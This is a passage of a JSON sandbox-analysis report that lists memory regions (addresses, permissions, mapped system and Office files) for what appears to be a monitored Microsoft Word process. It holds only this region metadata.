"region_184", "name": "private_0x0000000002790000", "norm_filename": null, "region_type": "private_memory", "start_va": 41484288, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 41549824, "type": "region", "version": 1 }, "end_va": 41656319, "entry_point": 41549824, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_185", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 41549824, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41680896, "type": "region", "version": 1 }, "end_va": 41684991, "entry_point": 41680896, "filename": "\\Windows\\System32\\msxml6r.dll", "id": "region_186", "name": "msxml6r.dll", "norm_filename": "c:\\windows\\system32\\msxml6r.dll", "region_type": "memory_mapped_file", "start_va": 41680896, "timestamp": "00:00:32.377", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 41746432, "type": "region", "version": 1 }, "end_va": 41750527, "entry_point": 0, "filename": null, "id": "region_187", "name": "pagefile_0x00000000027d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41746432, "timestamp": "00:00:32.382", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 41811968, "type": "region", "version": 1 }, "end_va": 42860543, "entry_point": 0, "filename": null, "id": "region_188", "name": "private_0x00000000027e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41811968, "timestamp": "00:00:32.382", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 126976, "start_va": 42860544, "type": "region", "version": 1 }, "end_va": 42987519, "entry_point": 42860544, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db", "id": "region_189", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "region_type": "memory_mapped_file", "start_va": 42860544, "timestamp": "00:00:32.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 42995711, "entry_point": 0, "filename": null, "id": "region_190", "name": "private_0x0000000002900000", "norm_filename": null, "region_type": "private_memory", "start_va": 42991616, "timestamp": "00:00:32.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 43057152, "type": "region", "version": 1 }, "end_va": 43581439, "entry_point": 0, "filename": null, "id": "region_191", "name": "private_0x0000000002910000", "norm_filename": null, "region_type": "private_memory", "start_va": 43057152, "timestamp": "00:00:32.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 43581440, "type": "region", "version": 1 }, "end_va": 43589631, "entry_point": 0, "filename": null, "id": "region_192", "name": "pagefile_0x0000000002990000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 43581440, "timestamp": "00:00:32.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 43646976, "type": "region", "version": 1 }, "end_va": 43716607, "entry_point": 43646976, "filename": "\\Windows\\System32\\C_1255.NLS", "id": "region_193", "name": "c_1255.nls", "norm_filename": "c:\\windows\\system32\\c_1255.nls", "region_type": "memory_mapped_file", "start_va": 43646976, "timestamp": "00:00:32.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 43843584, "type": "region", "version": 1 }, "end_va": 43909119, "entry_point": 0, "filename": null, "id": "region_194", "name": "private_0x00000000029d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43843584, "timestamp": "00:00:32.390", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 331776, "start_va": 43909120, "type": "region", "version": 1 }, "end_va": 44240895, "entry_point": 43909120, "filename": "\\Windows\\Fonts\\segoeuil.ttf", "id": "region_195", "name": "segoeuil.ttf", "norm_filename": "c:\\windows\\fonts\\segoeuil.ttf", "region_type": "memory_mapped_file", "start_va": 43909120, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 44367872, "type": "region", "version": 1 }, "end_va": 45416447, "entry_point": 0, "filename": null, "id": "region_196", "name": "private_0x0000000002a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 44367872, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 45416448, "type": "region", "version": 1 }, "end_va": 45547519, "entry_point": 0, "filename": null, "id": "region_197", "name": "private_0x0000000002b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 45416448, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 45613056, "type": "region", "version": 1 }, "end_va": 46661631, "entry_point": 0, "filename": null, "id": "region_198", "name": "private_0x0000000002b80000", "norm_filename": null, "region_type": "private_memory", "start_va": 45613056, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 46661632, "type": "region", "version": 1 }, "end_va": 48758783, "entry_point": 0, "filename": null, "id": "region_199", "name": "private_0x0000000002c80000", "norm_filename": null, "region_type": "private_memory", "start_va": 46661632, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1253376, "start_va": 48758784, "type": "region", "version": 1 }, "end_va": 50012159, "entry_point": 0, "filename": null, "id": "region_200", "name": "private_0x0000000002e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 48758784, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 50069504, "type": "region", "version": 1 }, "end_va": 51118079, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x0000000002fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 50069504, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 126976, "start_va": 51118080, "type": "region", "version": 1 }, "end_va": 51245055, "entry_point": 0, "filename": null, "id": "region_202", "name": "private_0x00000000030c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51118080, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 51249152, "type": "region", "version": 1 }, "end_va": 52297727, "entry_point": 0, "filename": null, "id": "region_203", "name": "private_0x00000000030e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51249152, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 52297728, "type": "region", "version": 1 }, "end_va": 53346303, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x00000000031e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 52297728, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 53346304, "type": "region", "version": 1 }, "end_va": 54394879, "entry_point": 0, "filename": null, "id": "region_205", "name": "private_0x00000000032e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 53346304, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 54394880, "type": "region", "version": 1 }, "end_va": 62783487, "entry_point": 0, "filename": null, "id": "region_206", "name": "pagefile_0x00000000033e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 54394880, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 62783488, "type": "region", "version": 1 }, "end_va": 64880639, "entry_point": 0, "filename": null, "id": "region_207", "name": "private_0x0000000003be0000", "norm_filename": null, "region_type": "private_memory", "start_va": 62783488, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 64880640, "type": "region", "version": 1 }, "end_va": 74514431, "entry_point": 64880640, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_208", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 64880640, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 520192, "start_va": 74514432, "type": "region", "version": 1 }, "end_va": 75034623, "entry_point": 74514432, "filename": "\\Windows\\Fonts\\segoeui.ttf", "id": "region_209", "name": "segoeui.ttf", "norm_filename": "c:\\windows\\fonts\\segoeui.ttf", "region_type": "memory_mapped_file", "start_va": 74514432, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 75104256, "type": "region", "version": 1 }, "end_va": 76152831, "entry_point": 0, "filename": null, "id": "region_210", "name": "private_0x00000000047a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75104256, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 76152832, "type": "region", "version": 1 }, "end_va": 77201407, "entry_point": 0, "filename": null, "id": "region_211", "name": "private_0x00000000048a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 76152832, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 77266944, "type": "region", "version": 1 }, "end_va": 78315519, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x00000000049b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 77266944, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 78315520, "type": "region", "version": 1 }, "end_va": 78446591, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x0000000004ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 78315520, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 78577664, "type": "region", "version": 1 }, "end_va": 79626239, "entry_point": 0, "filename": null, "id": "region_214", "name": "private_0x0000000004af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 78577664, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 409600, "start_va": 79626240, "type": "region", "version": 1 }, "end_va": 80035839, "entry_point": 79626240, "filename": "\\Windows\\Fonts\\seguisb.ttf", "id": "region_215", "name": "seguisb.ttf", "norm_filename": "c:\\windows\\fonts\\seguisb.ttf", "region_type": "memory_mapped_file", "start_va": 79626240, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 80084992, "type": "region", "version": 1 }, "end_va": 80150527, "entry_point": 0, "filename": null, "id": "region_216", "name": "private_0x0000000004c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 80084992, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 80543744, "type": "region", "version": 1 }, "end_va": 81592319, "entry_point": 0, "filename": null, "id": "region_217", "name": "private_0x0000000004cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 80543744, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 81788928, "type": "region", "version": 1 }, "end_va": 82313215, "entry_point": 0, "filename": null, "id": "region_218", "name": "private_0x0000000004e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 81788928, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 82313216, "type": "region", "version": 1 }, "end_va": 90701823, "entry_point": 0, "filename": null, "id": "region_219", "name": "pagefile_0x0000000004e80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 82313216, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 91095040, "type": "region", "version": 1 }, "end_va": 92143615, "entry_point": 0, "filename": null, "id": "region_220", "name": "private_0x00000000056e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 91095040, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 92143616, "type": "region", "version": 1 }, "end_va": 93192191, "entry_point": 0, "filename": null, "id": "region_221", "name": "private_0x00000000057e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 92143616, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 93519872, "type": "region", "version": 1 }, "end_va": 94044159, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x0000000005930000", "norm_filename": null, "region_type": "private_memory", "start_va": 93519872, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 94175232, "type": "region", "version": 1 }, "end_va": 94699519, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x00000000059d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 94175232, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 94896128, "type": "region", "version": 1 }, "end_va": 94961663, "entry_point": 0, "filename": null, "id": "region_224", "name": "private_0x0000000005a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 94896128, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 94961664, "type": "region", "version": 1 }, "end_va": 99155967, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x0000000005a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 94961664, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16777216, "start_va": 99155968, "type": "region", "version": 1 }, "end_va": 115933183, "entry_point": 0, "filename": null, "id": "region_226", "name": "pagefile_0x0000000005e90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 99155968, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 774144, "start_va": 116654080, "type": "region", "version": 1 }, "end_va": 117428223, "entry_point": 116654080, "filename": "\\Windows\\Fonts\\arial.ttf", "id": "region_227", "name": "arial.ttf", "norm_filename": "c:\\windows\\fonts\\arial.ttf", "region_type": "memory_mapped_file", "start_va": 116654080, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 117637120, "type": "region", "version": 1 }, "end_va": 118161407, "entry_point": 0, "filename": null, "id": "region_228", "name": "private_0x0000000007030000", "norm_filename": null, "region_type": "private_memory", "start_va": 117637120, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 118161408, "type": "region", "version": 1 }, "end_va": 122355711, "entry_point": 0, "filename": null, "id": "region_229", "name": "private_0x00000000070b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 118161408, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 123404288, "type": "region", "version": 1 }, "end_va": 124452863, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x00000000075b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 123404288, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 124452864, "type": "region", "version": 1 }, "end_va": 132841471, "entry_point": 0, "filename": null, "id": "region_231", "name": "private_0x00000000076b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 124452864, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 132841472, "type": "region", "version": 1 }, "end_va": 137039871, "entry_point": 0, "filename": null, "id": "region_232", "name": "private_0x0000000007eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 132841472, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 137101312, "type": "region", "version": 1 }, "end_va": 141299711, "entry_point": 0, "filename": null, "id": "region_233", "name": "private_0x00000000082c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 137101312, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 141361152, "type": "region", "version": 1 }, "end_va": 145559551, "entry_point": 0, "filename": null, "id": "region_234", "name": "private_0x00000000086d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 141361152, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4980736, "start_va": 145620992, "type": "region", "version": 1 }, "end_va": 150601727, "entry_point": 0, "filename": null, "id": "region_235", "name": "private_0x0000000008ae0000", "norm_filename": null, "region_type": "private_memory", "start_va": 145620992, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 150601728, "type": "region", "version": 1 }, "end_va": 154796031, "entry_point": 0, "filename": null, "id": "region_236", "name": "private_0x0000000008fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 150601728, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 156434432, "type": "region", "version": 1 }, "end_va": 157483007, "entry_point": 0, "filename": null, "id": "region_237", "name": "private_0x0000000009530000", "norm_filename": null, "region_type": "private_memory", "start_va": 156434432, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 928972800, "type": "region", "version": 1 }, "end_va": 929038335, "entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x00000000375f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 928972800, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1878982656, "type": "region", "version": 1 }, "end_va": 1879048191, "entry_point": 0, "filename": null, "id": "region_239", "name": "private_0x000000006fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1878982656, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 208896, "start_va": 1960181760, "type": "region", "version": 1 }, "end_va": 1960390655, "entry_point": 1960181760, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", "id": "region_240", "name": "osppc.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll", "region_type": "memory_mapped_file", "start_va": 1960181760, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002649088, "filename": "\\Windows\\System32\\user32.dll", "id": "region_241", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:00:32.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003697664, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_242", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:00:32.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_243", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:00:32.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006777856, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_244", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:00:32.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_245", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:32.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_246", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:32.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_247", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:32.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1945600, "start_va": 5358616576, "type": "region", "version": 1 }, "end_va": 5360562175, "entry_point": 5358616576, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "id": "region_248", "name": "winword.exe", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\winword.exe", "region_type": "memory_mapped_file", "start_va": 5358616576, "timestamp": "00:00:32.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 8790693969920, "type": "region", "version": 1 }, "end_va": 8790694035455, "entry_point": 0, "filename": null, "id": "region_249", "name": "private_0x000007febe310000", "norm_filename": null, "region_type": "private_memory", "start_va": 8790693969920, "timestamp": "00:00:32.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11505664, "start_va": 8791332618240, "type": "region", "version": 1 }, "end_va": 8791344123903, "entry_point": 8791332618240, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL", "id": "region_250", "name": "chart.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\chart.dll", "region_type": 